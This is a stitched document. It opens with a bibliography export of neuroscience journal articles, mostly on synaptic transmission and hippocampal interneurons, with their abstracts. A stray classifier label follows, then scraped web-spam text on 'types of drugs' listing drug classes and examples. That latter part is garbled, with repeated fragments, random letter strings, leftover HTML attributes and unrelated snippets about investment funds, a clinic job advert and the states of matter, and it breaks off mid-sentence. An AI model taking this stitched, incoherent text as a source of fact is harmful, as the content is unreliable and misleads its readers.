AU - Arai, Itaru AU - Jonas, Peter M ID - 2031 JF - eLife TI - Nanodomain coupling explains Ca^2+ independence of transmitter release time course at a fast central synapse VL - 3 ER - TY - JOUR AB - The hippocampus mediates several higher brain functions, such as learning, memory, and spatial coding. The input region of the hippocampus, the dentate gyrus, plays a critical role in these processes. Several lines of evidence suggest that the dentate gyrus acts as a preprocessor of incoming information, preparing it for subsequent processing in CA3. For example, the dentate gyrus converts input from the entorhinal cortex, where cells have multiple spatial fields, into the spatially more specific place cell activity characteristic of the CA3 region. Furthermore, the dentate gyrus is involved in pattern separation, transforming relatively similar input patterns into substantially different output patterns. Finally, the dentate gyrus produces a very sparse coding scheme in which only a very small fraction of neurons are active at any one time. AU - Jonas, Peter M AU - Lisman, John ID - 2041 JF - Frontiers in Neural Circuits TI - Structure, function and plasticity of hippocampal dentate gyrus microcircuits VL - 8 ER - TY - JOUR AB - The success story of fast-spiking, parvalbumin-positive (PV+) GABAergic interneurons (GABA, γ-aminobutyric acid) in the mammalian central nervous system is noteworthy. In 1995, the properties of these interneurons were completely unknown. Twenty years later, thanks to the massive use of subcellular patch-clamp techniques, simultaneous multiple-cell recording, optogenetics, in vivo measurements, and computational approaches, our knowledge about PV+ interneurons became more extensive than for several types of pyramidal neurons. These findings have implications beyond the “small world” of basic research on GABAergic cells. For example, the results provide a first proof of principle that neuroscientists might be able to close the gaps between the molecular, cellular, network, and behavioral levels, representing one of the main challenges at the present time. Furthermore, the results may form the basis for PV+ interneurons as therapeutic targets for brain disease in the future. However, much needs to be learned about the basic function of these interneurons before clinical neuroscientists will be able to use PV+ interneurons for therapeutic purposes. AU - Hu, Hua AU - Gan, Jian AU - Jonas, Peter M ID - 2062 IS - 6196 JF - Science TI - Fast-spiking parvalbumin^+ GABAergic interneurons: From cellular design to microcircuit function VL - 345 ER - TY - JOUR AB - Neuronal ectopia, such as granule cell dispersion (GCD) in temporal lobe epilepsy (TLE), has been assumed to result from a migration defect during development. Indeed, recent studies reported that aberrant migration of neonatal-generated dentate granule cells (GCs) increased the risk to develop epilepsy later in life. On the contrary, in the present study, we show that fully differentiated GCs become motile following the induction of epileptiform activity, resulting in GCD. Hippocampal slice cultures from transgenic mice expressing green fluorescent protein in differentiated, but not in newly generated GCs, were incubated with the glutamate receptor agonist kainate (KA), which induced GC burst activity and GCD. Using real-time microscopy, we observed that KA-exposed, differentiated GCs translocated their cell bodies and changed their dendritic organization. As found in human TLE, KA application was associated with decreased expression of the extracellular matrix protein Reelin, particularly in hilar interneurons. Together these findings suggest that KA-induced motility of differentiated GCs contributes to the development of GCD and establish slice cultures as a model to study neuronal changes induced by epileptiform activity. AU - Chai, Xuejun AU - Münzner, Gert AU - Zhao, Shanting AU - Tinnes, Stefanie AU - Kowalski, Janina AU - Häussler, Ute AU - Young, Christina AU - Haas, Carola AU - Frotscher, Michael ID - 2164 IS - 8 JF - Cerebral Cortex TI - Epilepsy-induced motility of differentiated neurons VL - 24 ER - TY - JOUR AB - Electron microscopy (EM) allows for the simultaneous visualization of all tissue components at high resolution. However, the extent to which conventional aldehyde fixation and ethanol dehydration of the tissue alter the fine structure of cells and organelles, thereby preventing detection of subtle structural changes induced by an experiment, has remained an issue. Attempts have been made to rapidly freeze tissue to preserve native ultrastructure. Shock-freezing of living tissue under high pressure (high-pressure freezing, HPF) followed by cryosubstitution of the tissue water avoids aldehyde fixation and dehydration in ethanol; the tissue water is immobilized in â ̂1/450 ms, and a close-to-native fine structure of cells, organelles and molecules is preserved. Here we describe a protocol for HPF that is useful to monitor ultrastructural changes associated with functional changes at synapses in the brain but can be applied to many other tissues as well. The procedure requires a high-pressure freezer and takes a minimum of 7 d but can be paused at several points. AU - Studer, Daniel AU - Zhao, Shanting AU - Chai, Xuejun AU - Jonas, Peter M AU - Graber, Werner AU - Nestel, Sigrun AU - Frotscher, Michael ID - 2176 IS - 6 JF - Nature Protocols TI - Capture of activity-induced ultrastructural changes at synapses by high-pressure freezing of brain tissue VL - 9 ER - TY - JOUR AB - Fast-spiking, parvalbumin-expressing GABAergic interneurons, a large proportion of which are basket cells (BCs), have a key role in feedforward and feedback inhibition, gamma oscillations and complex information processing. For these functions, fast propagation of action potentials (APs) from the soma to the presynaptic terminals is important. However, the functional properties of interneuron axons remain elusive. We examined interneuron axons by confocally targeted subcellular patch-clamp recording in rat hippocampal slices. APs were initiated in the proximal axon ∼20 μm from the soma and propagated to the distal axon with high reliability and speed. Subcellular mapping revealed a stepwise increase of Na^+ conductance density from the soma to the proximal axon, followed by a further gradual increase in the distal axon. Active cable modeling and experiments with partial channel block revealed that low axonal Na^+ conductance density was sufficient for reliability, but high Na^+ density was necessary for both speed of propagation and fast-spiking AP phenotype. Our results suggest that a supercritical density of Na^+ channels compensates for the morphological properties of interneuron axons (small segmental diameter, extensive branching and high bouton density), ensuring fast AP propagation and high-frequency repetitive firing. AU - Hu, Hua AU - Jonas, Peter M ID - 2228 IS - 5 JF - Nature Neuroscience SN - 10976256 TI - A supercritical density of Na^+ channels ensures fast signaling in GABAergic interneuron axons VL - 17 ER - TY - JOUR AB - The distance between Ca^2+ channels and release sensors determines the speed and efficacy of synaptic transmission. Tight "nanodomain" channel-sensor coupling initiates transmitter release at synapses in the mature brain, whereas loose "microdomain" coupling appears restricted to early developmental stages. To probe the coupling configuration at a plastic synapse in the mature central nervous system, we performed paired recordings between mossy fiber terminals and CA3 pyramidal neurons in rat hippocampus. Millimolar concentrations of both the fast Ca^2+ chelator BAPTA [1,2-bis(2-aminophenoxy)ethane- N,N, N′,N′-tetraacetic acid] and the slow chelator EGTA efficiently suppressed transmitter release, indicating loose coupling between Ca^2+ channels and release sensors. Loose coupling enabled the control of initial release probability by fast endogenous Ca^2+ buffers and the generation of facilitation by buffer saturation. Thus, loose coupling provides the molecular framework for presynaptic plasticity. AU - Vyleta, Nicholas AU - Jonas, Peter M ID - 2229 IS - 6171 JF - Science SN - 00368075 TI - Loose coupling between Ca^2+ channels and release sensors at a plastic hippocampal synapse VL - 343 ER - TY - JOUR AB - Intracellular electrophysiological recordings provide crucial insights into elementary neuronal signals such as action potentials and synaptic currents. Analyzing and interpreting these signals is essential for a quantitative understanding of neuronal information processing, and requires both fast data visualization and ready access to complex analysis routines. To achieve this goal, we have developed Stimfit, a free software package for cellular neurophysiology with a Python scripting interface and a built-in Python shell. The program supports most standard file formats for cellular neurophysiology and other biomedical signals through the Biosig library. To quantify and interpret the activity of single neurons and communication between neurons, the program includes algorithms to characterize the kinetics of presynaptic action potentials and postsynaptic currents, estimate latencies between pre- and postsynaptic events, and detect spontaneously occurring events. We validate and benchmark these algorithms, give estimation errors, and provide sample use cases, showing that Stimfit represents an efficient, accessible and extensible way to accurately analyze and interpret neuronal signals. AU - Guzmán, José AU - Schlögl, Alois AU - Schmidt Hieber, Christoph ID - 2230 IS - FEB JF - Frontiers in Neuroinformatics SN - 16625196 TI - Stimfit: Quantifying electrophysiological data with Python VL - 8 ER - TY - JOUR AB - Theta-gamma network oscillations are thought to represent key reference signals for information processing in neuronal ensembles, but the underlying synaptic mechanisms remain unclear. To address this question, we performed whole-cell (WC) patch-clamp recordings from mature hippocampal granule cells (GCs) in vivo in the dentate gyrus of anesthetized and awake rats. GCs in vivo fired action potentials at low frequency, consistent with sparse coding in the dentate gyrus. GCs were exposed to barrages of fast AMPAR-mediated excitatory postsynaptic currents (EPSCs), primarily relayed from the entorhinal cortex, and inhibitory postsynaptic currents (IPSCs), presumably generated by local interneurons. EPSCs exhibited coherence with the field potential predominantly in the theta frequency band, whereas IPSCs showed coherence primarily in the gamma range. Action potentials in GCs were phase locked to network oscillations. Thus, theta-gamma-modulated synaptic currents may provide a framework for sparse temporal coding of information in the dentate gyrus. AU - Pernia-Andrade, Alejandro AU - Jonas, Peter M ID - 2254 IS - 1 JF - Neuron SN - 08966273 TI - Theta-gamma-modulated synaptic currents in hippocampal granule cells in vivo define a mechanism for network oscillations VL - 81 ER - TY - JOUR AB - Spontaneous postsynaptic currents (PSCs) provide key information about the mechanisms of synaptic transmission and the activity modes of neuronal networks. However, detecting spontaneous PSCs in vitro and in vivo has been challenging, because of the small amplitude, the variable kinetics, and the undefined time of generation of these events. Here, we describe a, to our knowledge, new method for detecting spontaneous synaptic events by deconvolution, using a template that approximates the average time course of spontaneous PSCs. A recorded PSC trace is deconvolved from the template, resulting in a series of delta-like functions. The maxima of these delta-like events are reliably detected, revealing the precise onset times of the spontaneous PSCs. Among all detection methods, the deconvolution-based method has a unique temporal resolution, allowing the detection of individual events in high-frequency bursts. Furthermore, the deconvolution-based method has a high amplitude resolution, because deconvolution can substantially increase the signal/noise ratio. When tested against previously published methods using experimental data, the deconvolution-based method was superior for spontaneous PSCs recorded in vivo. Using the high-resolution deconvolution-based detection algorithm, we show that the frequency of spontaneous excitatory postsynaptic currents in dentate gyrus granule cells is 4.5 times higher in vivo than in vitro. AU - Pernia-Andrade, Alejandro AU - Goswami, Sarit AU - Stickler, Yvonne AU - Fröbe, Ulrich AU - Schlögl, Alois AU - Jonas, Peter M ID - 2954 IS - 7 JF - Biophysical Journal TI - A deconvolution based method with high sensitivity and temporal resolution for detection of spontaneous synaptic currents in vitro and in vivo VL - 103 ER - TY - THES AB - CA3 pyramidal neurons are important for memory formation and pattern completion in the hippocampal network. These neurons receive multiple excitatory inputs from numerous sources. Therefore, the rules of spatiotemporal integration of multiple synaptic inputs and propagation of action potentials are important to understand how CA3 neurons contribute to higher brain functions at cellular level. By using confocally targeted patch-clamp recording techniques, we investigated the biophysical properties of rat CA3 pyramidal neuron dendrites. We found two distinct dendritic domains critical for action potential initiation and propagation: In the proximal domain, action potentials initiated in the axon backpropagate actively with large amplitude and fast time course. In the distal domain, Na+-channel mediated dendritic spikes are efficiently evoked by local dendritic depolarization or waveforms mimicking synaptic events. These findings can be explained by a high Na+-to-K+ conductance density ratio of CA3 pyramidal neuron dendrites. The results challenge the prevailing view that proximal mossy fiber inputs activate CA3 pyramidal neurons more efficiently than distal perforant inputs by showing that the distal synapses trigger a different form of activity represented by dendritic spikes. The high probability of dendritic spike initiation in the distal area may enhance the computational power of CA3 pyramidal neurons in the hippocampal network. AU - Kim, Sooyun ID - 2964 TI - Active properties of hippocampal CA3 pyramidal neuron dendrites ER - TY - JOUR AB - The coupling between presynaptic Ca^(2+) channels and Ca^(2+) sensors of exocytosis is a key determinant of synaptic transmission. Evoked release from parvalbumin (PV)-expressing interneurons is triggered by nanodomain coupling of P/Q-type Ca^(2+) channels, whereas release from cholecystokinin (CCK)-containing interneurons is generated by microdomain coupling of N-type channels. Nanodomain coupling has several functional advantages, including speed and efficacy of transmission. One potential disadvantage is that stochastic opening of presynaptic Ca^(2+) channels may trigger spontaneous transmitter release. We addressed this possibility in rat hippocampal granule cells, which receive converging inputs from different inhibitory sources. Both reduction of extracellular Ca^(2+) concentration and the unselective Ca^(2+) channel blocker Cd^(2+) reduced the frequency of miniature IPSCs (mIPSCs) in granule cells by ~50%, suggesting that the opening of presynaptic Ca^(2+) channels contributes to spontaneous release. Application of the selective P/Q-type Ca^(2+) channel blocker ω-agatoxin IVa had no detectable effects, whereas both the N-type blocker ω-conotoxin GVIa and the L-type blocker nimodipine reduced mIPSC frequency. Furthermore, both the fast Ca^(2+) chelator BAPTA-AM and the slow chelator EGTA-AM reduced the mIPSC frequency, suggesting that Ca^(2+)-dependent spontaneous release is triggered by microdomain rather than nanodomain coupling. The CB_(1) receptor agonist WIN 55212-2 also decreased spontaneous release; this effect was occluded by prior application of ω-conotoxin GVIa, suggesting that a major fraction of Ca^(2+)-dependent spontaneous release was generated at the terminals of CCK-expressing interneurons. Tonic inhibition generated by spontaneous opening of presynaptic N- and L-type Ca^(2+) channels may be important for hippocampal information processing. AU - Goswami, Sarit AU - Bucurenciu, Iancu AU - Jonas, Peter M ID - 2969 IS - 41 JF - Journal of Neuroscience TI - Miniature IPSCs in hippocampal granule cells are triggered by voltage-gated Ca^(2+) channels via microdomain coupling VL - 32 ER - TY - JOUR AB - The BCI competition IV stands in the tradition of prior BCI competitions that aim to provide high quality neuroscientific data for open access to the scientific community. As experienced already in prior competitions not only scientists from the narrow field of BCI compete, but scholars with a broad variety of backgrounds and nationalities. They include high specialists as well as students.The goals of all BCI competitions have always been to challenge with respect to novel paradigms and complex data. We report on the following challenges: (1) asynchronous data, (2) synthetic, (3) multi-class continuous data, (4) sessionto-session transfer, (5) directionally modulated MEG, (6) finger movements recorded by ECoG. As after past competitions, our hope is that winning entries may enhance the analysis methods of future BCIs. AU - Tangermann, Michael AU - Müller, Klaus AU - Aertsen, Ad AU - Birbaumer, Niels AU - Braun, Christoph AU - Brunner, Clemens AU - Leeb, Robert AU - Mehring, Carsten AU - Miller, Kai AU - Müller Putz, Gernot AU - Nolte, Guido AU - Pfurtscheller, Gert AU - Preissl, Hubert AU - Schalk, Gerwin AU - Schlögl, Alois AU - Vidaurre, Carmen AU - Waldert, Stephan AU - Blankertz, Benjamin ID - 493 JF - Frontiers in Neuroscience TI - Review of the BCI competition IV VL - 6 ER - TY - JOUR AB - Voltage-activated Ca(2+) channels (VACCs) mediate Ca(2+) influx to trigger action potential-evoked neurotransmitter release, but the mechanism by which Ca(2+) regulates spontaneous transmission is unclear. We found that VACCs are the major physiological triggers for spontaneous release at mouse neocortical inhibitory synapses. Moreover, despite the absence of a synchronizing action potential, we found that spontaneous fusion of a GABA-containing vesicle required the activation of multiple tightly coupled VACCs of variable type. AU - Williams, Courtney AU - Chen, Wenyan AU - Lee, Chia AU - Yaeger, Daniel AU - Vyleta, Nicholas AU - Smith, Stephen ID - 3121 IS - 9 JF - Nature Neuroscience TI - Coactivation of multiple tightly coupled calcium channels triggers spontaneous release of GABA VL - 15 ER - TY - JOUR AB - CA3 pyramidal neurons are important for memory formation and pattern completion in the hippocampal network. It is generally thought that proximal synapses from the mossy fibers activate these neurons most efficiently, whereas distal inputs from the perforant path have a weaker modulatory influence. We used confocally targeted patch-clamp recording from dendrites and axons to map the activation of rat CA3 pyramidal neurons at the subcellular level. Our results reveal two distinct dendritic domains. In the proximal domain, action potentials initiated in the axon backpropagate actively with large amplitude and fast time course. In the distal domain, Na+ channel–mediated dendritic spikes are efficiently initiated by waveforms mimicking synaptic events. CA3 pyramidal neuron dendrites showed a high Na+-to-K+ conductance density ratio, providing ideal conditions for active backpropagation and dendritic spike initiation. Dendritic spikes may enhance the computational power of CA3 pyramidal neurons in the hippocampal network. AU - Kim, Sooyun AU - Guzmán, José AU - Hu, Hua AU - Jonas, Peter M ID - 3258 IS - 4 JF - Nature Neuroscience TI - Active dendrites support efficient initiation of dendritic spikes in hippocampal CA3 pyramidal neurons VL - 15 ER - TY - JOUR AB - The physical distance between presynaptic Ca2+ channels and the Ca2+ sensors that trigger exocytosis of neurotransmitter-containing vesicles is a key determinant of the signalling properties of synapses in the nervous system. Recent functional analysis indicates that in some fast central synapses, transmitter release is triggered by a small number of Ca2+ channels that are coupled to Ca2+ sensors at the nanometre scale. Molecular analysis suggests that this tight coupling is generated by protein–protein interactions involving Ca2+ channels, Ca2+ sensors and various other synaptic proteins. Nanodomain coupling has several functional advantages, as it increases the efficacy, speed and energy efficiency of synaptic transmission. AU - Eggermann, Emmanuel AU - Bucurenciu, Iancu AU - Goswami, Sarit AU - Jonas, Peter M ID - 3317 IS - 1 JF - Nature Reviews Neuroscience TI - Nanodomain coupling between Ca(2+) channels and sensors of exocytosis at fast mammalian synapses VL - 13 ER - TY - JOUR AB - Spontaneous release of glutamate is important for maintaining synaptic strength and controlling spike timing in the brain. Mechanisms regulating spontaneous exocytosis remain poorly understood. Extracellular calcium concentration ([Ca2+]o) regulates Ca2+ entry through voltage-activated calcium channels (VACCs) and consequently is a pivotal determinant of action potential-evoked vesicle fusion. Extracellular Ca 2+ also enhances spontaneous release, but via unknown mechanisms. Here we report that external Ca2+ triggers spontaneous glutamate release more weakly than evoked release in mouse neocortical neurons. Blockade of VACCs has no effect on the spontaneous release rate or its dependence on [Ca2+]o. Intracellular [Ca2+] slowly increases in a minority of neurons following increases in [Ca2+]o. Furthermore, the enhancement of spontaneous release by extracellular calcium is insensitive to chelation of intracellular calcium by BAPTA. Activation of the calcium-sensing receptor (CaSR), a G-protein-coupled receptor present in nerve terminals, by several specific agonists increased spontaneous glutamate release. The frequency of spontaneous synaptic transmission was decreased in CaSR mutant neurons. The concentration-effect relationship for extracellular calcium regulation of spontaneous release was well described by a combination of CaSR-dependent and CaSR-independent mechanisms. Overall these results indicate that extracellular Ca2+ does not trigger spontaneous glutamate release by simply increasing calcium influx but stimulates CaSR and thereby promotes resting spontaneous glutamate release. AU - Vyleta, Nicholas AU - Smith, Stephen ID - 469 IS - 12 JF - European Journal of Neuroscience TI - Spontaneous glutamate release is independent of calcium influx and tonically activated by the calcium-sensing receptor VL - 31 ER - TY - JOUR AB - BioSig is an open source software library for biomedical signal processing. The aim of the BioSig project is to foster research in biomedical signal processing by providing free and open source software tools for many different application areas. Some of the areas where BioSig can be employed are neuroinformatics, brain-computer interfaces, neurophysiology, psychology, cardiovascular systems, and sleep research. Moreover, the analysis of biosignals such as the electroencephalogram (EEG), electrocorticogram (ECoG), electrocardiogram (ECG), electrooculogram (EOG), electromyogram (EMG), or respiration signals is a very relevant element of the BioSig project. Specifically, BioSig provides solutions for data acquisition, artifact processing, quality control, feature extraction, classification, modeling, and data visualization, to name a few. In this paper, we highlight several methods to help students and researchers to work more efficiently with biomedical signals. AU - Schlögl, Alois AU - Vidaurre, Carmen AU - Sander, Tilmann ID - 490 JF - Computational Intelligence and Neuroscience TI - BioSig: The free and open source software library for biomedical signal processing VL - 2011 ER - TY - JOUR AB - Parvalbumin is thought to act in a manner similar to EGTA, but how a slow Ca2+ buffer affects nanodomain-coupling regimes at GABAergic synapses is unclear. Direct measurements of parvalbumin concentration and paired recordings in rodent hippocampus and cerebellum revealed that parvalbumin affects synaptic dynamics only when expressed at high levels. Modeling suggests that, in high concentrations, parvalbumin may exert BAPTA-like effects, modulating nanodomain coupling via competition with local saturation of endogenous fixed buffers. AU - Eggermann, Emmanuel AU - Jonas, Peter M ID - 3318 JF - Nature Neuroscience TI - How the “slow” Ca(2+) buffer parvalbumin affects transmitter release in nanodomain coupling regimes at GABAergic synapses VL - 15 ER - TY - JOUR AB - Rab3 interacting molecules (RIMs) are highly enriched in the active zones of presynaptic terminals. It is generally thought that they operate as effectors of the small G protein Rab3. Three recent papers, by Han et al. (this issue of Neuron), Deng et al. (this issue of Neuron), and Kaeser et al. (a recent issue of Cell), shed new light on the functional role of RIM in presynaptic terminals. First, RIM tethers Ca2+ channels to active zones. Second, RIM contributes to priming of synaptic vesicles by interacting with another presynaptic protein, Munc13. AU - Pernia-Andrade, Alejandro AU - Jonas, Peter M ID - 3369 IS - 2 JF - Neuron TI - The multiple faces of RIM VL - 69 ER - TY - JOUR AB - Long-term depression (LTD) is a form of synaptic plasticity that may contribute to information storage in the central nervous system. Here we report that LTD can be elicited in layer 5 pyramidal neurons of the rat prefrontal cortex by pairing low frequency stimulation with a modest postsynaptic depolarization. The induction of LTD required the activation of both metabotropic glutamate receptors of the mGlu1 subtype and voltage-sensitive Ca(2+) channels (VSCCs) of the T/R, P/Q and N types, leading to the stimulation of intracellular inositol trisphosphate (IP3) receptors by IP3 and Ca(2+). The subsequent release of Ca(2+) from intracellular stores activated the protein phosphatase cascade involving calcineurin and protein phosphatase 1. The activation of purinergic P2Y(1) receptors blocked LTD. This effect was prevented by P2Y(1) receptor antagonists and was absent in mice lacking P2Y(1) but not P2Y(2) receptors. We also found that activation of P2Y(1) receptors inhibits Ca(2+) transients via VSCCs in the apical dendrites and spines of pyramidal neurons. In addition, we show that the release of ATP under hypoxia is able to inhibit LTD by acting on postsynaptic P2Y(1) receptors. In conclusion, these data suggest that the reduction of Ca(2+) influx via VSCCs caused by the activation of P2Y(1) receptors by ATP is the possible mechanism for the inhibition of LTD in prefrontal cortex. AU - Guzmán, José AU - Schmidt, Hartmut AU - Franke, Heike AU - Krügel, Ute AU - Eilers, Jens AU - Illes, Peter AU - Gerevich, Zoltan ID - 3718 IS - 6 JF - Neuropharmacology TI - P2Y1 receptors inhibit long-term depression in the prefrontal cortex. VL - 59 ER - TY - JOUR AB - A recent paper by von Engelhardt et al. identifies a novel auxiliary subunit of native AMPARs, termedCKAMP44. Unlike other auxiliary subunits, CKAMP44 accelerates desensitization and prolongs recovery from desensitization. CKAMP44 is highly expressed in hippocampal dentate gyrus granule cells and decreases the paired-pulse ratio at perforant path input synapses. Thus, both principal and auxiliary AMPAR subunits control the time course of signaling at glutamatergic synapses. AU - Guzmán, José AU - Jonas, Peter M ID - 3832 IS - 1 JF - Neuron TI - Beyond TARPs: The growing list of auxiliary AMPAR subunits VL - 66 ER - TY - JOUR AU - Jonas, Peter M AU - Hefft, Stefan ID - 3833 IS - 7 JF - The European Journal of Neuroscience TI - GABA release at terminals of CCK-interneurons: synchrony, asynchrony and modulation by cannabinoid receptors (commentary on Ali & Todorova) VL - 31 ER -
__label__pos
0.707049
Types of drugs in basic science kr Attend to patients’ inquiries about medication, treatment, and other TCM-related queries; Lead and/or assist in health talks and educational programs; Adhere to the TCM Physician’s Code of Conduct and MOH’s regulatory requirements; Undertake clinic management, operations, and Supervisory duties as necessary; Candidate Requirements i. A Simplified Guide To Forensic Science Pick your topic: All or some of the projects listed were fully or partially funded through grants from the Bureau of Justice Assistance, the National. TYPES OF DRUGS Naturally Occurring Drugs Synthetic Drugs METHOD OF USING DRUG Oral - tablets, caplets, capsules and liquid are taken through the mouth, that swallow. Muscular injection - liquid drugs taken by injection through the buttocks. Veinous injection - liquid drugs taken by injection through the vein. Occular - eye drops. Basic medical research (otherwise known as experimental research) includes animal experiments, cell studies, biochemical, genetic and physiological investigations, and. ybtnar pc DepositPhotos. Today, the U.S. Food and Drug Administration approved the Tzield (teplizumab-mzwv) injection to delay the onset of stage 3 type 1 diabetes in adults and pediatric patients 8 years. There are several types of hallucinogenic drugs. They include the following: Psilocybin (magic mushrooms) Phencyclidine Ketamine Lysergic Acid Diethylamide (LSD) Cannabis Risks of Hallucinogen Abuse Like the other drug categories mentioned, hallucinogen abuse also has several effects and risks. Teens who use drugs may act out and may do poorly in school or drop out. 6 Using drugs when the brain is still developing may cause lasting brain changes and put the user at increased risk of dependence. 7. Adults who use drugs can have problems thinking clearly, remembering, and paying attention. Rogers’ science of unitary human beings: humans as energy fields that interact constantly with the environment ANS: D REF: pp. 83-84, Table 5-2 Rogers’ science of unitary human beings, in which humans are seen as energy fields that interact constantly with the environment, is a theory in which the nurse promotes synchronicity between human beings. Pharmacology Research Paper Webster dictionary defines a drug as "a medicine or other substance which has a physiological effect when ingested or otherwise i... Opioid Research Paper An Opioid is a medication that lessens pain; this is achieved by reducing the intensity of pain signals from the central nervous system’s location, inside th. serve!asthe!basisforcriminal!proceedingsand!help!to!determine!sentencing! for!convictedoffenders. Principles of Forensic Drug Chemistry Forensic!drugchemistryis!simplychemistryas!it!is!appliedtothe!. pm sx Some of the commonly used drugs approved by the Food and Drug Administration (F.D.A) in the U.S. and other government bodies are: Paracetamol Amoxicillin Metronidazole Quinine Ciprofloxacin Diclofenac LSD Marijuana (Cannabis) Cocaine Nicotine Strong Anti-Inflammatory Drugs Anti-inflammatory drugs reduce swelling or inflammation. It has distinctive characteristics of the times. Types Of Type 1 Diabetes Drugs Things. this substance increases blood sugar The creative activity embodies the ardent diabetes medications and osteoporosis desire for perfection in a magnificent mansion, and all great deeds originate from the desire for perfection. The four classifications of psychoactive drugs. 1. Depressants: Drugs classified as depressants are used to depress the functions of the central nervous system. This depression decreases the level of arousal or the level of stimulation in certain areas of the brain. Notable effects of depressants include lowered brain processing speed and. Type of drug Effect on body Example; Depressant: Slows down nerve and brain activity: Alcohol, solvents, temazepam: Hallucinogen: Alters what we see and hear: LSD: Painkiller: Blocks nerve. There are various drugs like anticoagulants, antiplatelet drugs and fibrinolytic drugs which are involved in controlling the coagulation process. Cardiovascular Drugs: These affect the functioning of the heart and blood vessels. They are administered for cardiovascular diseases like hypertension, and atherosclerosis. Alcohol | Tobacco | E-Cigarettes | Marijuana | Ecstasy | Inhalants | Cough Medicine | Methamphetamine | Amphetamine | Prescription Drugs | Rohypnol Alcohol: Alcohol is a. 1. Select low cost funds 2. Consider carefully the added cost of advice 3. Do not overrate past fund performance 4. Use past performance only to determine consistency and risk 5. Beware of star managers 6. Beware of asset size 7. Don't own too many funds 8. Buy your fund portfolio and hold it! wo Teens who use drugs may act out and may do poorly in school or drop out. 6 Using drugs when the brain is still developing may cause lasting brain changes and put the user at increased risk of dependence. 7. Adults who use drugs can have problems thinking clearly, remembering, and paying attention. be Gamma hydroxybutyrate (GHB), Rohypnol, ketamine, as well as MDMA (ecstasy) and methamphetamine are some of the drugs included in this group. GHB (Xyrem) is a central nervous system (CNS) depressant that was approved by the Food and Drug Administration (FDA) in 2002 for use in the treatment of narcolepsy (a sleep disorder). oe yn A "drug class" is a group of medications with certain similarities. Three dominant methods are used to classify them: 1. Mechanism of action: Specific changes they cause in your body. Physiologic effect: How your body responds to them. Some of the commonly used drugs approved by the Food and Drug Administration (F.D.A) in the U.S. and other government bodies are: Paracetamol Amoxicillin Metronidazole Quinine. tabindex="0" title="Explore this page" aria-label="Show more" role="button" aria-expanded="false">. In 2013, MLSC funding helped HMS establish the Laboratory of Systems Pharmacology (LSP), an effort to reinvent the science of drug discovery by demolishing the silos between basic and therapeutic science. The new laboratory and the programs it houses build on the model established by the LSP, and together the laboratories serve as true hubs of. Narcotics (opiates) Narcotic drugs, also known as opioids, are drugs that induce a pleasant state of relaxation and drowsiness but can also cause partial euphoria, slowed pulse. There are 4 main types of inhalants: volatile solvents – liquids that turn into a gas at room temperatures for example, paint thinners and removers, glues, petrol and correction fluid. General Drug Categories.Analgesics: Drugs that relieve pain. There are two main types: non-narcotic analgesics for mild pain, and narcotic analgesics for severe pain.Antacids: Drugs that relieve .... facebook dmg. Types of drugs.Drugs under international control include amphetamine-type stimulants, coca/cocaine, cannabis, hallucinogens, opiates and sedative. Drugs are chemicals of low molecule mass (~ 100–500u). They interact with macromolecular targets and produce bio-reactions. When bio-reactions are therapeutic and beneficial, these chemicals are called drugs and are used to diagnose, prevent and treat diseases. If more than the recommended amount is used, most drugs are effective poisons. Narcotics (opiates) Narcotic drugs, also known as opioids, are drugs that induce a pleasant state of relaxation and drowsiness but can also cause partial euphoria, slowed pulse and breathing, and nausea. They are commonly used as analgesics and include opium derivates such as morphine, codeine, methadone, and heroin. zq zq gk According to the new study, which the researchers published in Science, this new class of antidepressants relies on a new compound that begins working much more quickly.It works so quickly because. Codeine:Codeine may also be recognized by a brand or trade name, and prescribed in different forms depending on its intention of treatment.For example, aspirin and codeine (generic name). The FDA has also issued a warning for any SGTL2 inhibitor stating it may lead to diabetic ketoacidosis (DKA). Those with type 1 diabetes using off-label should be cautious due to the possibility of developing DKA with normal blood sugars. Oral drug. Sulfonylureas: chlorpropamide (Diabinese) glipizide (Glucotrol and Glucotrol XL). Illicit drug use comes with possession of illegal drugs, leading to criminal charges in most states. Grouping Drugs Based on Effect. Many drugs that are considered addictive or. CLASSIFICATION OF MATTER Matter can be classified into two major types Living Matter: This refers to things that have life in them e.g. goat, man, lion, plant etc. Non-Living Matter: This refers to things that have no life in them e.g. stone, water, chair, book, etc. STATES OF MATTER Matter exists in three main states. These are: Solid state. A medication or medicine is a drug taken to cure or ameliorate any symptoms of an illness or medical condition. The use may also be as preventive medicine that has future benefits but. Olanzapine. Risperidone. Quetiapine. Asenapine. Ziprasidone. Lurasidone. Antianxiety drugs: They are used to treat anxiety symptoms such as panic attacks, worry, and extreme fear. Some of the commonly used antianxiety medications include: Antidepressants such as fluoxetine, sertraline, escitalopram, imipramine, and citalopram. They are also used for the management of alcohol withdrawal symptoms. Xanax, Ativan, Klonopin, Valium, and Restoril are commonly used benzodiazepines. Non-Benzodiazepine Sedatives: Non-benzodiazepine sedatives are also used to manage insomnia as well. Some examples of these prescription medications are Ambien, Sonata, and Lunesta. Abatacept Abciximab Acebutolol Aceclofenac Acenocoumarol Acetazolamide Acetic Acid Acetyl cysteine Acetylcholine Acitretin Acriflavine Acrivastine Actinomycin D Acyclovir Adalimumab Adapalene Adefovir Adefovir dipivoxil Adenosine Adrenaline Albendazole Albuterol / Salbutamol Alcaftadine Alcohol Alendronate Alfuzosin Aliskiren Allopurinol. nv ro eu UWorld is proud to be an equal opportunity employer providing a drug-free workplace. If you have a disability or special need that requires accommodation, please let us know. Pharmacology Research Paper Webster dictionary defines a drug as "a medicine or other substance which has a physiological effect when ingested or otherwise i... Opioid Research Paper An Opioid is a medication that lessens pain; this is achieved by reducing the intensity of pain signals from the central nervous system’s location, inside th. Hallucinogens are a group of drugs that impact a person's awareness levels. They're split into two categories: classic hallucinogens and dissociative drugs. They cause hallucinations, which are sensations and images that seem real, but are not. Two of the most common hallucinogens are LSD (D-lysergic acid diethylamide) and PCP (Phencyclidine). General Drug Categories. Analgesics: Drugs that relieve pain. There are two main types: non-narcotic analgesics for mild pain, and narcotic analgesics for severe pain. Antacids: Drugs that. Codeine:Codeine may also be recognized by a brand or trade name, and prescribed in different forms depending on its intention of treatment.For example, aspirin and codeine (generic name). class="scs_arw" tabindex="0" title="Explore this page" aria-label="Show more" role="button" aria-expanded="false">. xg About drugs; Topics . We've organised our health, ageing and sport information into topics. Browse our alphabetical list of topics and diseases, or use the ... Type. Disease (71) Apply Disease filter ; Topic (49) Apply Topic filter ; 120 results. Search . Aboriginal and Torres Strait Islander health;. na kf Codeine:Codeine may also be recognized by a brand or trade name, and prescribed in different forms depending on its intention of treatment.For example, aspirin and codeine (generic name). There are 6 types of drugs, with different effects depending on their active ingredients: 